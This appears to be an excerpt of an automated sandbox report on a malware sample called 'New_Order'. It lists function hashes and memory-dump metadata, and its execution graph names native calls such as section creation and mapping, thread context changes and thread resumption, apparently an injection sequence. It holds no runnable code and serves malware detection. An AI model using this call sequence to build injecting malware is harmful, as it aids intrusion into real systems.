                                                                                                • Instruction Fuzzy Hash: AC11F2B5800349DFDB20DF9AD884BDEBFF8EB48320F148459E958A7251D3B5A944CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF093E9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0DF0944D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: d43081da016338121df3d3b23743eb01c36f64cc3913a3489926bd55d124a119
                                                                                                • Instruction ID: d0fc5d1867768477bec78c1e570f93762bd2dcff7bce3beacb151b59b1673ba4
                                                                                                • Opcode Fuzzy Hash: d43081da016338121df3d3b23743eb01c36f64cc3913a3489926bd55d124a119
                                                                                                • Instruction Fuzzy Hash: 611106B5800348DFDB10DF9AD885BDEBFF8EB48320F148459E514A7240D375A584CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EEB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EEB086
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: e67392c9b2017db41997abead0475700a507f38c9778f9ababc6a3c9ea00b1a7
                                                                                                • Instruction ID: b15d10c092e4c9135c0008d9353bdd783ce8bde731617e4e4037f6bd2d3e577e
                                                                                                • Opcode Fuzzy Hash: e67392c9b2017db41997abead0475700a507f38c9778f9ababc6a3c9ea00b1a7
                                                                                                • Instruction Fuzzy Hash: F711CDB5C00789CEDB20DF9AD444A9EFBF8EB88324F14845AD429B7610C379A945CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E8D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 945e418231cd518fe20b18cd5ee522be17fe0c52808a085479bca56b0847ff55
                                                                                                • Instruction ID: 17dd17b72e227811fd6fc6f6b8230e56089bf32cfe120d27ccf5b98fbec0cfbd
                                                                                                • Opcode Fuzzy Hash: 945e418231cd518fe20b18cd5ee522be17fe0c52808a085479bca56b0847ff55
                                                                                                • Instruction Fuzzy Hash: 962125B1508204DFDB05EF14DDC0B26BFA5FB98324F24C569E90D5B296C336E856CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9D01C Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6a2a04497967d36822fd0050386e1be8fc45ba031298872e0775721e54796224
                                                                                                • Instruction ID: 7d5fef2995345be5f7a483b2c873d9b9b468a73b4e4862346af9bc5839bfffbe
                                                                                                • Opcode Fuzzy Hash: 6a2a04497967d36822fd0050386e1be8fc45ba031298872e0775721e54796224
                                                                                                • Instruction Fuzzy Hash: 7D21F571508240DFDF14DF14D984B16BBA6FB88314F24C56DD94A5B286C33AD847CA61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1404da0f0178e087ee6f5c072eb7afe2af48e9ca86119ad2a42bcdbfe20e0d5b
                                                                                                • Instruction ID: 91639d770783f8624424d9287451f6b0265d19a3e4938a52a4cbf46475c2f24a
                                                                                                • Opcode Fuzzy Hash: 1404da0f0178e087ee6f5c072eb7afe2af48e9ca86119ad2a42bcdbfe20e0d5b
                                                                                                • Instruction Fuzzy Hash: DF2126B1508204EFDF05DF54DDC0B26BBA5FB88318F24CA6DE9095B2A6C336D806CA61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9D005 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a67a1317e3adc291c210000caaabd34b3c9caabc0d3d9058c1f0a2bd0377676
                                                                                                • Instruction ID: feafed1c1dd91b1c807c26f514adf79a5a2b49042bc9b1b90c369de25ca82102
                                                                                                • Opcode Fuzzy Hash: 8a67a1317e3adc291c210000caaabd34b3c9caabc0d3d9058c1f0a2bd0377676
                                                                                                • Instruction Fuzzy Hash: 6C21837550D3C08FDB12CF24D990715BF71EB46314F28C5DAD8498B2A7C33A984ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E8D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction ID: 43ce104cdf0cb16c148fa337cca20ccbf5475c5ae342fbdbe0ba3a60921d70e1
                                                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction Fuzzy Hash: 18110372404280DFDB12DF00D9C0B16BF71FB94324F24C2A9D90D4B256C33AE85ACBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                • Instruction ID: e7c3395690667d86d961b5ddc7fe6621def00eaa662b23819951fd657f550399
                                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                • Instruction Fuzzy Hash: 7D11BB75508280DFDB12CF50C9C0B15BBA1FB84318F24C6A9D8494B2A6C33AD81ACB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E8D745 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9caa9cd7b86e7c8be89d0c54877adcf065347a0790892a41693debd09a511c92
                                                                                                • Instruction ID: 4c7fa006a7ee952bfb0e782f42abfea46e6ffd52517f300c3291fa631f812254
                                                                                                • Opcode Fuzzy Hash: 9caa9cd7b86e7c8be89d0c54877adcf065347a0790892a41693debd09a511c92
                                                                                                • Instruction Fuzzy Hash: F001A7714083449AE720AE16CD84BA6BFA8DF45364F18C95BED0D6E2C6D27A9841CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E8D744 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49892852d08a38a8bdf1a5e39fdbc368f5152ba8d5138b44074f2955226917ad
                                                                                                • Instruction ID: 3abd1383a8a264a421eafb16436748534c242328dec42ac8daa3695e5fa4fd25
                                                                                                • Opcode Fuzzy Hash: 49892852d08a38a8bdf1a5e39fdbc368f5152ba8d5138b44074f2955226917ad
                                                                                                • Instruction Fuzzy Hash: 33F06272408384AEE7109E16CC84B66FF98EB91738F18C55AFD0C5B2D6C27A9844CBB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00EEDC74 Relevance: .3, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf354646a0449aa7432245b23a42f70bcb297fa3797f4976b065e1423629f6e6
                                                                                                • Instruction ID: dd064adf6d6f1e41004be3b501866096df3197421a558826cb88376107e0319f
                                                                                                • Opcode Fuzzy Hash: bf354646a0449aa7432245b23a42f70bcb297fa3797f4976b065e1423629f6e6
                                                                                                • Instruction Fuzzy Hash: 74A14A32A002598FCF05DFA6C8405AEB7F2FF84304B29957AE905BB265DB71E955CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.4%
                                                                                                Dynamic/Decrypted Code Coverage:1.8%
                                                                                                Signature Coverage:10.2%
                                                                                                Total number of Nodes:400
                                                                                                Total number of Limit Nodes:35
                                                                                                execution_graph 91679 427f43 91680 427f61 91679->91680 91681 427fba 91679->91681 91688 4291b3 91680->91688 91683 4291b3 LdrLoadDll 91681->91683 91685 427fd0 91683->91685 91684 427f7e 91692 40abe3 91684->91692 91687 427fb3 91689 4291c2 91688->91689 91691 429228 91688->91691 91689->91691 91696 423bc3 91689->91696 91691->91684 91695 40ac08 91692->91695 91693 40ad25 NtCreateFile 91694 40ad64 91693->91694 91694->91687 91695->91693 91697 423bd1 91696->91697 91698 423bdd 91696->91698 91697->91698 91701 424043 LdrLoadDll 91697->91701 91698->91691 91700 423d2f 91700->91691 91701->91700 91702 423723 91703 42373f 91702->91703 91714 427ea3 91703->91714 91706 423767 91708 4281b3 2 API calls 91706->91708 91707 42377b 91718 4281b3 91707->91718 91710 423770 91708->91710 91711 423784 91722 42a0e3 LdrLoadDll RtlAllocateHeap 91711->91722 91713 42378f 91715 427ebd 91714->91715 91716 4291b3 LdrLoadDll 91715->91716 91717 423760 91716->91717 91717->91706 91717->91707 91719 4281d0 91718->91719 91720 4291b3 LdrLoadDll 91719->91720 91721 4281e1 NtClose 91720->91721 91721->91711 91722->91713 91723 401a81 91724 401a9a 91723->91724 91727 42b543 91724->91727 91730 429bb3 91727->91730 91731 429bd9 91730->91731 91742 4160d3 91731->91742 91733 429bef 91741 401b3c 91733->91741 91745 41a183 91733->91745 91735 429c0e 91736 429c23 91735->91736 91761 428513 91735->91761 91757 425f93 91736->91757 91739 429c32 91740 428513 2 API calls 91739->91740 91740->91741 91765 416023 91742->91765 91744 4160e0 91744->91733 91746 41a1af 91745->91746 91806 417533 91746->91806 91748 41a1c1 91810 41a073 91748->91810 91751 41a1dc 91752 4281b3 2 API calls 91751->91752 91754 41a1e7 91751->91754 91752->91754 91753 41a1f4 91755 4281b3 2 API calls 91753->91755 91756 41a205 91753->91756 91754->91735 91755->91756 91756->91735 91758 425fed 91757->91758 91760 425ffa 91758->91760 91838 417cd3 91758->91838 91760->91739 91762 42852d 91761->91762 91763 4291b3 LdrLoadDll 91762->91763 91764 42853e ExitProcess 91763->91764 91764->91736 91772 425073 91765->91772 91769 416046 91771 416053 91769->91771 91779 428b53 91769->91779 91771->91744 91773 425082 91772->91773 91774 423bc3 LdrLoadDll 91773->91774 91775 41603a 91774->91775 91776 4250d3 91775->91776 91786 428433 91776->91786 91781 428b6b 91779->91781 91780 428b8f 91780->91771 91781->91780 91790 4278f3 91781->91790 91787 42844d 91786->91787 91788 4291b3 LdrLoadDll 91787->91788 91789 4250f0 91788->91789 91789->91769 91791 427910 91790->91791 91792 4291b3 LdrLoadDll 91791->91792 91793 427921 91792->91793 91799 12c2c0a 91793->91799 91794 42793c 91796 429fc3 91794->91796 91802 4284c3 91796->91802 91798 428bfd 91798->91771 91800 12c2c1f LdrInitializeThunk 91799->91800 91801 12c2c11 91799->91801 91800->91794 91801->91794 91803 4284e0 91802->91803 91804 4291b3 LdrLoadDll 91803->91804 91805 4284f1 RtlFreeHeap 91804->91805 91805->91798 91807 417579 91806->91807 91820 4173c3 LdrLoadDll 91807->91820 91809 41760c 91809->91748 91811 41a169 91810->91811 91812 41a08d 91810->91812 91811->91751 91811->91753 91821 417483 91812->91821 91814 41a0d2 91826 427943 91814->91826 91816 41a117 91830 427993 91816->91830 91819 4281b3 2 API calls 91819->91811 91820->91809 91822 4174a8 91821->91822 91823 4174b3 91822->91823 91836 4173c3 LdrLoadDll 91822->91836 91823->91814 91825 4174fb 91825->91814 91827 427960 91826->91827 91828 4291b3 LdrLoadDll 91827->91828 91829 427971 91828->91829 91829->91816 91831 4279b0 91830->91831 91832 4291b3 LdrLoadDll 91831->91832 91833 4279c1 91832->91833 91837 12c35c0 LdrInitializeThunk 91833->91837 91834 41a15d 91834->91819 91836->91825 91837->91834 91840 417ce3 91838->91840 91863 41816b 91840->91863 91864 4230c3 91840->91864 91841 417d9c 91841->91863 91867 413af3 91841->91867 91843 417e0a 91844 429fc3 2 API calls 91843->91844 91843->91863 91848 417e22 91844->91848 91845 417e54 91851 417e5b 91845->91851 91884 41a213 91845->91884 91847 417e94 91847->91863 91891 427a93 91847->91891 91848->91845 91880 406cc3 91848->91880 91851->91863 91900 427583 91851->91900 91853 417ef1 91909 427603 91853->91909 91855 417f11 91856 4180fa 91855->91856 91918 406d33 91855->91918 91859 41811d 91856->91859 91926 427703 91856->91926 91861 41813a 91859->91861 91922 41a3e3 91859->91922 91862 428513 2 API calls 91861->91862 91862->91863 91863->91760 91935 429f33 91864->91935 91866 4230e4 91866->91841 91869 413b59 91867->91869 91870 413b12 91867->91870 91868 413c67 91868->91843 91869->91868 91879 413c30 91869->91879 91951 413293 91869->91951 91870->91868 91870->91869 91874 41a3e3 2 API calls 91870->91874 91873 413c44 91873->91868 91968 41a483 LdrLoadDll RtlFreeHeap LdrInitializeThunk 91873->91968 91874->91870 91876 413c5d 91876->91843 91877 413b96 91877->91879 91964 413553 91877->91964 91879->91868 91967 41a483 LdrLoadDll RtlFreeHeap LdrInitializeThunk 91879->91967 91882 406cf3 91880->91882 91881 41a3e3 2 API calls 91881->91882 91882->91881 91883 406d14 91882->91883 91883->91845 91885 41a230 91884->91885 91983 4279e3 91885->91983 91887 41a280 91888 41a287 91887->91888 91889 427a93 2 API calls 91887->91889 91888->91847 91890 41a2b0 91889->91890 91890->91847 91892 427b06 91891->91892 91893 427ab1 91891->91893 91894 4291b3 LdrLoadDll 91892->91894 91895 4291b3 LdrLoadDll 91893->91895 91896 427b1c 91894->91896 91897 427ace 91895->91897 91896->91851 91996 40a9b3 91897->91996 91899 427aff 91899->91851 91901 4275d6 91900->91901 91902 4275a1 91900->91902 91903 4291b3 LdrLoadDll 91901->91903 91904 4291b3 LdrLoadDll 91902->91904 91905 4275ec 91903->91905 91906 4275be 91904->91906 91905->91853 92000 409f53 91906->92000 91908 4275cf 91908->91853 91910 427621 91909->91910 91911 427656 91909->91911 91912 4291b3 LdrLoadDll 91910->91912 91913 4291b3 LdrLoadDll 91911->91913 91914 42763e 91912->91914 91915 42766c 91913->91915 92004 40a163 91914->92004 91915->91855 91917 42764f 91917->91855 91919 406d53 91918->91919 91920 41a3e3 2 API calls 91919->91920 91921 406d73 91919->91921 91920->91919 91921->91856 91923 41a3f6 91922->91923 92008 427823 91923->92008 91925 41a421 91925->91859 91927 427721 91926->91927 91928 427756 91926->91928 91930 4291b3 LdrLoadDll 91927->91930 91929 4291b3 LdrLoadDll 91928->91929 91933 42776c 91929->91933 91931 42773e 91930->91931 92021 40a373 91931->92021 91933->91859 91934 42774f 91934->91859 91938 4282f3 91935->91938 91937 429f64 91937->91866 91939 428314 91938->91939 91940 428359 91938->91940 91942 4291b3 LdrLoadDll 91939->91942 91941 4291b3 LdrLoadDll 91940->91941 91943 42836f 91941->91943 91944 428331 91942->91944 91943->91937 91947 40b6a3 91944->91947 91946 428352 91946->91937 91949 40b6c8 91947->91949 91948 40b7e5 NtAllocateVirtualMemory 91950 40b810 91948->91950 91949->91948 91950->91946 91952 4132a3 91951->91952 91953 41329e 91951->91953 91954 429f33 2 API calls 91952->91954 91953->91877 91957 4132c8 91954->91957 91955 41332f 91955->91877 91957->91955 91959 413335 91957->91959 91963 429f33 2 API calls 91957->91963 91969 4278a3 91957->91969 91975 4283e3 91957->91975 91960 41335f 91959->91960 91961 4283e3 2 API calls 91959->91961 91960->91877 91962 413350 91961->91962 91962->91877 91963->91957 91965 413575 91964->91965 91966 4283e3 2 API calls 91964->91966 91965->91879 91966->91965 91967->91873 91968->91876 91970 4278c0 91969->91970 91971 4291b3 LdrLoadDll 91970->91971 91972 4278d1 91971->91972 91981 12c2df0 LdrInitializeThunk 91972->91981 91973 4278e8 91973->91957 91976 428400 91975->91976 91977 4291b3 LdrLoadDll 91976->91977 91978 428411 91977->91978 91982 12c2c70 LdrInitializeThunk 91978->91982 91979 428428 91979->91957 91981->91973 91982->91979 91984 427a04 91983->91984 91985 427a4d 91983->91985 91986 4291b3 LdrLoadDll 91984->91986 91987 4291b3 LdrLoadDll 91985->91987 91989 427a21 91986->91989 91988 427a63 91987->91988 91988->91887 91992 40a793 91989->91992 91991 427a46 91991->91887 91995 40a7b8 91992->91995 91993 40a8d5 NtCreateSection 91994 40a904 91993->91994 91994->91991 91995->91993 91999 40a9d8 91996->91999 91997 40aaf5 NtMapViewOfSection 91998 40ab30 91997->91998 91998->91899 91999->91997 92003 409f78 92000->92003 92001 40a095 NtGetContextThread 92002 40a0b0 92001->92002 92002->91908 92003->92001 92005 40a188 92004->92005 92006 40a2a5 NtSetContextThread 92005->92006 92007 40a2c0 92006->92007 92007->91917 92009 427841 92008->92009 92010 427876 92008->92010 92011 4291b3 LdrLoadDll 92009->92011 92012 4291b3 LdrLoadDll 92010->92012 92013 42785e 92011->92013 92016 42788c 92012->92016 92017 40b283 92013->92017 92015 42786f 92015->91925 92016->91925 92020 40b2a8 92017->92020 92018 40b3c5 NtDelayExecution 92019 40b3e1 92018->92019 92019->92015 92020->92018 92022 40a398 92021->92022 92023 40a4b5 NtResumeThread 92022->92023 92024 40a4d0 92023->92024 92024->91934 92025 42b0a3 92026 42b0b3 92025->92026 92027 42b0b9 92025->92027 92030 42a0a3 92027->92030 92029 42b0df 92033 428473 92030->92033 92032 42a0be 92032->92029 92034 42848d 92033->92034 92035 4291b3 LdrLoadDll 92034->92035 92036 42849e RtlAllocateHeap 92035->92036 92036->92032 92143 428073 92144 428094 92143->92144 92145 4280e5 92143->92145 92146 4291b3 LdrLoadDll 92144->92146 92147 4291b3 LdrLoadDll 92145->92147 92148 4280b1 92146->92148 92149 4280fb 92147->92149 92152 40ae13 92148->92152 92151 4280de 92154 40ae38 92152->92154 92153 40af55 NtReadFile 92155 40af8c 92153->92155 92154->92153 92155->92151 92156 423ab3 92160 423ac2 92156->92160 92157 423b06 92158 429fc3 2 API calls 92157->92158 92159 423b16 92158->92159 92160->92157 92161 423b47 92160->92161 92163 423b4c 92160->92163 92162 429fc3 2 API calls 92161->92162 92162->92163 92037 41a363 92045 4274f3 92037->92045 92039 41a3a7 92040 41a3c8 92039->92040 92052 427683 92039->92052 92042 41a3b8 92043 41a3d4 92042->92043 92044 4281b3 2 API calls 92042->92044 92044->92040 92046 427511 92045->92046 92047 42754e 92045->92047 92048 4291b3 LdrLoadDll 92046->92048 92049 4291b3 LdrLoadDll 92047->92049 92050 42752e 92048->92050 92051 427564 92049->92051 92050->92039 92051->92039 92053 4276a1 92052->92053 92054 4276d6 92052->92054 92056 4291b3 LdrLoadDll 92053->92056 92055 4291b3 LdrLoadDll 92054->92055 92057 4276ec 92055->92057 92058 4276be 92056->92058 92057->92042 92061 409d43 92058->92061 92060 4276cf 92060->92042 92063 409d68 92061->92063 92062 409e85 NtSuspendThread 92064 409ea0 92062->92064 92063->92062 92064->92060 92065 4139c3 92066 4139c6 92065->92066 92073 4171a3 92066->92073 92068 4139fb 92069 423bc3 LdrLoadDll 92068->92069 92070 413a11 92069->92070 92071 413a40 92070->92071 92072 413a2f PostThreadMessageW 92070->92072 92072->92071 92075 4171c7 92073->92075 92074 4171ce 92074->92068 92075->92074 92076 417203 LdrLoadDll 92075->92076 92077 41721a 92075->92077 92076->92077 92077->92068 92078 41d3c3 92079 41d3e9 92078->92079 92080 423bc3 LdrLoadDll 92079->92080 92082 41d43d 92080->92082 92081 41d7b3 92082->92081 92125 428553 LdrLoadDll 92082->92125 92084 41d48e 92085 41d79b 92084->92085 92126 42b1d3 92084->92126 92086 429fc3 2 API calls 92085->92086 92086->92081 92088 41d4ad 92088->92085 92089 41d5b3 92088->92089 92090 4278f3 2 API calls 92088->92090 92132 4184b3 LdrLoadDll LdrInitializeThunk 92089->92132 92091 41d531 92090->92091 92091->92089 92095 41d539 92091->92095 92093 41d5de 92093->92085 92097 41d613 92093->92097 92135 4183b3 NtMapViewOfSection LdrLoadDll 92093->92135 92094 41d599 92098 429fc3 2 API calls 92094->92098 92095->92081 92095->92094 92096 41d568 92095->92096 92133 4183b3 NtMapViewOfSection LdrLoadDll 92095->92133 92101 4281b3 2 API calls 92096->92101 92105 41d643 92097->92105 92106 41d77a 92097->92106 92102 41d5a9 92098->92102 92103 41d578 92101->92103 92134 4256e3 NtDelayExecution LdrLoadDll 92103->92134 92136 428253 LdrLoadDll 92105->92136 92108 429fc3 2 API calls 92106->92108 92109 41d791 92108->92109 92110 41d662 92111 41a213 3 API calls 92110->92111 92112 41d6cb 92111->92112 92112->92085 92113 41d6d6 92112->92113 92114 429fc3 2 API calls 92113->92114 92115 41d6fa 92114->92115 92137 427b53 LdrLoadDll 92115->92137 92117 41d70e 92118 427a93 2 API calls 92117->92118 92119 41d735 92118->92119 92120 41d73c 92119->92120 92138 427b53 LdrLoadDll 92119->92138 92122 41d762 92123 427703 2 API calls 92122->92123 92124 41d770 92123->92124 92125->92084 92127 42b143 92126->92127 92128 42a0a3 2 API calls 92127->92128 92129 42b1a0 92127->92129 92130 42b17d 92128->92130 92129->92088 92131 429fc3 2 API calls 92130->92131 92131->92129 92132->92093 92133->92096 92134->92094 92135->92097 92136->92110 92137->92117 92138->92122 92139 418388 92140 4281b3 2 API calls 92139->92140 92141 418392 92140->92141 92142 12c2b60 LdrInitializeThunk

                                                                                                Executed Functions

                                                                                                Function 0040A373 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170nativethreadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A4BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID: %o@$%o@
                                                                                                • API String ID: 947044025-618112537
                                                                                                • Opcode ID: ae548c58b8bec19867577c38a8f03e9695c8a6baf870870004c942aeaa731805
                                                                                                • Instruction ID: 3fd8d6c651b5643ecb509381c46d34c45c258947da4c2eb78b8359e5d2c3ae60
                                                                                                • Opcode Fuzzy Hash: ae548c58b8bec19867577c38a8f03e9695c8a6baf870870004c942aeaa731805
                                                                                                • Instruction Fuzzy Hash: CD718075E04258DFCB04CFA9C890AEDBBF1BF49304F18806AE455B7341D638A951CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A793 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 87 40a793-40a7f7 call 4097e3 call 4097f3 92 40a8d5-40a8fe NtCreateSection 87->92 93 40a7fd-40a842 call 409883 call 42b5c2 call 409753 call 42b5c2 87->93 95 40a904-40a90b 92->95 96 40a99b-40a9a7 92->96 115 40a84d-40a853 93->115 98 40a916-40a91c 95->98 99 40a944-40a948 98->99 100 40a91e-40a942 98->100 103 40a98a-40a998 call 409883 99->103 104 40a94a-40a951 99->104 100->98 103->96 107 40a95c-40a962 104->107 107->103 110 40a964-40a988 107->110 110->107 116 40a855-40a879 115->116 117 40a87b-40a87f 115->117 116->115 117->92 119 40a881-40a89c 117->119 120 40a8a7-40a8ad 119->120 120->92 121 40a8af-40a8d3 120->121 121->120
                                                                                                APIs
                                                                                                • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A8F1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateSection
                                                                                                • String ID: An@
                                                                                                • API String ID: 2449625523-62601564
                                                                                                • Opcode ID: 6a8b091e51d7f3e2a47a90b0ee25977ec37e98cf51e1e34780f956743c7d34d2
                                                                                                • Instruction ID: 0cd009df8be98b1283c590809a3dac17e942fab79fb81b92ecc77cecc237782f
                                                                                                • Opcode Fuzzy Hash: 6a8b091e51d7f3e2a47a90b0ee25977ec37e98cf51e1e34780f956743c7d34d2
                                                                                                • Instruction Fuzzy Hash: 97714CB1E04258DFCB04CFA9C490AEDBBF1AF8D314F18816AE859B7341D638A952CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040ABE3 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
